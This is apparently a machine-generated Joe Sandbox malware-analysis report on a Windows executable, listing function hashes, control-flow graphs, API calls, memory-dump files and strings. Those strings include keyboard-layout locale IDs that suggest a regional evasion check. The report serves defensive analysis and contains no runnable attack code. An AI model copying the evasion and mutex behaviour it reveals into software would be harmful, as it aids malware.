                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConditionVariableWake
                                                                                                                                                                                                                                          • String ID: c13L$c13L
                                                                                                                                                                                                                                          • API String ID: 1192502693-2565585393
                                                                                                                                                                                                                                          • Opcode ID: fa7f3028c1e82d47d059cea7fd2ce62c5d7b5e4d900a28deba2f0d74c3292867
                                                                                                                                                                                                                                          • Instruction ID: e51fbb17950c3c47a19aafc3ccecce8f0556cafd726c2f332562baccfa588892
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7f3028c1e82d47d059cea7fd2ce62c5d7b5e4d900a28deba2f0d74c3292867
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF728C70A201449BEB18EF38DC89B9D7B79EF45304F60825DF809973C1DB359AA4CB91
                                                                                                                                                                                                                                          Function 0029652B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,0029652A,?,?,?,?,?,00297661), ref: 00296567
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                          • Opcode ID: ab4c115c4c5974fe047cd52329329b523f1b52759f60ef8f4b44a7700e12ad79
                                                                                                                                                                                                                                          • Instruction ID: 8948370e3fc678671ebb32d211cd622f3a8b7969322c62379b5c0a604fef2469
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab4c115c4c5974fe047cd52329329b523f1b52759f60ef8f4b44a7700e12ad79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0C231021248AFDF257F18C90DD4C3BA9FF1274DF424805FD084A222CB35EEA2CA80
                                                                                                                                                                                                                                          Function 04AC069B Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dde03f062f5a13f741b3e0d108ed2df6885d7cfcc9a1ae7e8c35c2b61061fbf7
                                                                                                                                                                                                                                          • Instruction ID: 8eb848afc8bb67f3c60691e1b03cc8691e64ad57d320e372668e0082365fc8ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dde03f062f5a13f741b3e0d108ed2df6885d7cfcc9a1ae7e8c35c2b61061fbf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5121ACFB28C614FD618685C22B60AB63A7EE2D2730331C42EF447D5102F2955A4A7AB2
                                                                                                                                                                                                                                          Function 00265C10 Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 434COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 169 265c10-265cf7 call 265940 call 2659e0 call 264b30 178 265d21-265d3c call 27cff1 169->178 179 265cf9-265d05 169->179 180 265d17-265d1e call 27d663 179->180 181 265d07-265d15 179->181 180->178 181->180 183 265d42-265e23 call 296c6a call 2940f0 RegOpenKeyExA RegCloseKey 181->183 193 265e26-265e2b 183->193 193->193 194 265e2d-265e86 call 2780c0 193->194 198 265eb0-265ecc call 27cff1 194->198 199 265e88-265e94 194->199 200 265ea6-265ead call 27d663 199->200 201 265e96-265ea4 199->201 200->198 201->200 203 265ecd-265fde call 296c6a 201->203 214 265fe0-265fec 203->214 215 266008-266015 call 27cff1 203->215 216 265ffe-266005 call 27d663 214->216 217 265fee-265ffc 214->217 216->215 217->216 219 266016-26658e call 296c6a call 27e150 call 2780c0 * 5 217->219 243 266590-26659f 219->243 244 2665bb-2665d6 call 27cff1 219->244 245 2665b1-2665b8 call 27d663 243->245 246 2665a1-2665af 243->246 245->244 246->245 248 2665d7-2666b8 call 296c6a call 277a00 call 265c10 246->248 264 2666bc-2666db call 2622c0 248->264 265 2666ba 248->265 268 26670c-266712 264->268 269 2666dd-2666ec 264->269 265->264 272 266715-26671a 268->272 270 266702-266709 call 27d663 269->270 271 2666ee-2666fc 269->271 270->268 271->270 273 266937 call 296c6a 271->273 272->272 275 26671c-266744 call 277a00 call 265c10 272->275 279 26693c call 296c6a 273->279 285 266746 275->285 286 266748-266769 call 2622c0 275->286 283 266941-266d6f call 296c6a call 278200 call 296c6a 279->283 285->286 293 26679a-2667ae 286->293 294 26676b-26677a 286->294 303 2667b4-2667ba 293->303 304 266858-26687c 293->304 296 266790-266797 call 27d663 294->296 297 26677c-26678a 294->297 296->293 297->279 297->296 307 2667c0-2667ed call 277a00 call 265c10 303->307 305 266880-266885 304->305 305->305 308 266887-2668ec call 2780c0 * 2 305->308 321 2667f1-266818 call 2622c0 307->321 322 2667ef 307->322 319 2668ee-2668fd 308->319 320 266919-266936 call 27cff1 308->320 323 26690f-266916 call 27d663 319->323 324 2668ff-26690d 319->324 331 26681a-266829 321->331 332 266849-26684c 321->332 322->321 323->320 324->283 324->323 333 26683f-266846 call 27d663 331->333 334 26682b-266839 331->334 332->307 335 266852 332->335 333->332 334->273 334->333 335->304
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$c13L$c13L$c13L
                                                                                                                                                                                                                                          • API String ID: 0-1534921301
                                                                                                                                                                                                                                          • Opcode ID: 9233f746144cb4300dfa00e83fd64cf8093ad35beeae3b7558d84c8605c60676
                                                                                                                                                                                                                                          • Instruction ID: 741cf8de22bdde8572d24dc1513c401dc93d1f83e066e93a7af142836b8f0b33
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9233f746144cb4300dfa00e83fd64cf8093ad35beeae3b7558d84c8605c60676
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FF1F170910258ABEF24DF64CC85BDEBBB9EF45304F5042A9F509A7281DB749AE4CF90
                                                                                                                                                                                                                                          Function 00269BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 898 269ba5-269d91 call 277a00 call 265c10 call 268b30 call 278220
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 36cf249e97cb44b5c578087537040425b9a36b3294622ff8b1944dc89a41279f
                                                                                                                                                                                                                                          • Instruction ID: ad2d8ea9c8f324f9cf22b70330eb90c492535733988a188233619a2ab8641f44
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36cf249e97cb44b5c578087537040425b9a36b3294622ff8b1944dc89a41279f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B317B31624200CBEB08DB78DEC975DB7BAEFC5314F248219E414A73D5CB7599E08B51
                                                                                                                                                                                                                                          Function 00269F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
